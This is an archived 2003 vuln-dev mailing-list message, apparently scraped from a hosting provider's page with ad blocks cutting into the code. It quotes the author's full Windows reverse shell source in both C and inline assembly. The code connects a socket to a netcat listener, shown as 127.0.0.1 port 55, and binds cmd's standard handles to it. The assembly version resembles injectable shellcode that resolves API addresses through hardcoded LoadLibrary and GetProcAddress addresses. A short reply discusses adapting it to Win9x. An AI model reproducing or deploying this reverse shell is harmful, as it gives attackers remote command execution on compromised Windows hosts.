Hosting Provided By

Re[2]: Windows reverse Shell #2

From: NetNinja <netninja(at)hotmail.kg>
Date: Sat Feb 08 2003 - 02:11:26 EST

Hello s7726,

Saturday, February 8, 2003, 12:09:45 AM, you wrote:

s> Could this work on a win9x machine? with some mods of course. namely command s> rather than cmd, or is this strictly an NT/2k thing?

s> Thanx,
s> Gavin S.

s> -----Original Message-----
s> From: NetNinja [mailto:netninja@hotmail.kg]
s> Sent: Friday, February 07, 2003 4:45 AM
s> To: vuln-dev@securityfocus.com
s> Subject: Windows reverse Shell #2

s> Hello folks,

s> Thnx everyone for ur replies.
s> Today i found time to have a careful look at my reverse shell C source
s> code. THe problem that i had was very simple. In my C source i forgot to
s> initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's
s> code did initilize that struct, so big thnx to him. Another thing
s> u have to do is to cast socket handle returned from WSASocket call to
s> ptr type and pass it on to stdInput,stdOutput and stdErr of
s> STARTUPINFO struct.
s> That's it!
s> If anyone is interested in reverse cmd shell for windows i have
s> included both C and inline asm version. so have a look at them.

s> ---- C ---------------

s> /*
s> reverse cmd shell

s> Will spit back command shell on ur listening netcat s> on ur localhost (127.0.0.2) port 55

s> set up ur netcat eg. nc -l -p 55 -vv

Do you need help?

s> Adik (netninja@hotmail.kg)
s> http://netninja.to.kg

s>   */
s> #include 
s> #include 
s> #pragma comment(lib,"ws2_32")

s> void main(int argc, char *argv[])
s> {
s>         WSADATA wsaData;
s>         SOCKET hSocket;
s>         STARTUPINFO si;
s>         PROCESS_INFORMATION pi;
s>         struct sockaddr_in adik_sin;
s>         memset(&adik_sin,0,sizeof(adik_sin));
s>         memset(&si,0,sizeof(si));
s>         WSAStartup(MAKEWORD(2,0),&wsaData);
s>         hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
s>         adik_sin.sin_family = AF_INET;
s>         adik_sin.sin_port = htons(55);
s>         adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
s>         connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
s>         si.cb = sizeof(si);
s>         si.dwFlags = STARTF_USESTDHANDLES;
s>         si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
s>         CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi);
Do you need more help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
s>         ExitProcess(0);

s> }

s> ------[ end C ]--------------

s> ----[ inline ASM ]------
s> /*
s> reverse cmd shell
s> inline asm version

s> reverse cmd shell on address 127.0.0.1 port 55

s> Adik (netninja@hotmail.kg)
s> http://netninja.to.kg

s> */

s> #include 
s> #include 
s> #pragma comment(lib,"ws2_32")

s> #define GP      0x77E7B332
s> #define LL  0x77E7D961
s> #define CreateProcessA          [ebp-8]
s> #define ExitProcess             [ebp-0ch]
s> #define WSASocketA              [ebp-10h]
s> #define connect                 [ebp-14h]
s> #define CMD_STR                 [ebp-18h]
s> #define PORT                    0x3700          //(htons(55)) here u gotta
s> reverse byte order 0x0037=3700
s> #define IPADDR                  0x0100007F      //

s> 7F000001//(inet_addr("127.0.0.1"))

s> void main(int argc, char *argv[])
s> {
s>     char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0"
s>                  "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0";
s>         char *i=ptr;

s>         WSADATA wsaData;
s>         WSAStartup(MAKEWORD(2,0),&wsaData);             //initialize

s> winsock, this is not done below

s> // usually when u inject ur shellcode into remote process

s> // socket is already initialized
s>         __asm
s>         {

s>                 mov edi, i
s>                 dec edi

s>                 push ebp
s>                 mov ebp,esp
s>                 sub esp,0x20

s>                 mov ecx,ebp
s>                 sub ecx,4h
s>                 push ecx

s> load_lib:
s>                 inc edi
s>                 cmp byte ptr[edi],0
s>                 je done_loadin

s>                 push edi
s>                 mov eax, LL
s>                 call eax                        //LoadLibrary("Lib")

s>                 mov [ebp-4],eax         //places lib handle into ebp-4
s>                 xor eax,eax
s>                 repne scasb

s> load_func:

s>                 cmp byte ptr[edi],0
s>                 je load_lib

s>                 push edi

s>                 mov ebx, dword ptr[ebp-4] //lib handle
Can't find what you're looking for? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
s>                 push ebx
s>                 mov eax, GP
s>                 call eax

s> //GetProcAddress("Function")

s>                 pop ecx
s>                 sub ecx,4
s>                 mov dword ptr[ecx], eax
s>                 push ecx
s>                 xor eax,eax
s>                 repne scasb

s>                 jmp load_func

Can we help you?

s> done_loadin:

s>                 xor eax,eax
s>                 inc edi
s>                 mov dword ptr[ebp-18h],edi
s>                 mov ecx,50                                      //make some
s> space for structs
s> push_em:
s>                 push eax
s>                 loop push_em

s>                 push 0x1
s>                 push 0x2
s>                 call WSASocketA

s>                 mov ebx, eax            //copies sockethandle returned into

s> ebx

s>                   //ebp-20h
s>                 mov dword ptr[ebp-40h],0x2
s> //sockaddr_in
s>                 mov word ptr[ebp-3Eh],PORT
s>                 mov dword ptr[ebp-3Ch],IPADDR

s>                 //mov dword ptr[ebp-40h],process_information

s>                 mov dword ptr[ebp-94h],0x44             //sizeof startupinfo
s>                 mov dword ptr[ebp-68h],0x100    //dwFlags
s>                 mov dword ptr[ebp-5Ch],ebx              //stdio
s>                 mov dword ptr[ebp-58h],ebx              //stdout
s>                 mov dword ptr[ebp-54h],ebx              //stderr

s>                 push 0x10
s> //sizeof sockaddr_in
s>                 lea edx, dword ptr[ebp-40h]
s>                 push edx
s> //ptr to sockaddr_in
s>                 push ebx
s> //socket handle
s>                 call connect

s>                 lea edx,dword ptr[ebp-50h]
s>                 push edx                                        //push
s> proc_info
s>                 lea edx,dword ptr[ebp-94h]
s>                 push edx                                        //push ptr
Don't know where to look next? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
s> to startupinfo
s>                 xor edx,edx
s>                 push edx
s>                 push edx
s>                 push edx
s>                 inc edx
s> //inheritHandles = true
s>                 push edx
s>                 dec edx
s>                 push edx
s>                 push edx
s>                 mov eax,CMD_STR                         //ptr to "cmd" str
s>                 push eax
s>                 push edx
s>                 call CreateProcessA

s>                 push edx
s>                 call ExitProcess

s>         }

s> }

s> ----[ end ]------

s> --
s> Best regards,
s>  Adik        (NetNinja)                          mailto:netninja@hotmail.kg

When i put command.com instead of cmd.exe as a parameter to CreateProcess, reverse commandshell appeared on my nc, however i failed to execute command and c the results. in addition to that my nc stopped respondin and cpu usage jumped to 100% so i had to shut it down. but u can try playing n pokin around with it. perhaps u will c different results.

-- 
Best regards,
 NetNinja                            mailto:netninja@hotmail.kg

Received on Sun Feb 9 19:02:16 2003

This message: [ Message body ]
Next message: Paul Brereton: "Strange IE / Windows Behaviour"
Previous message: alias(at)securityfocus.com: "Yet another plaintext attack to ZIP encryption scheme."
In reply to: s7726: "RE: Windows reverse Shell #2"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:38 EDT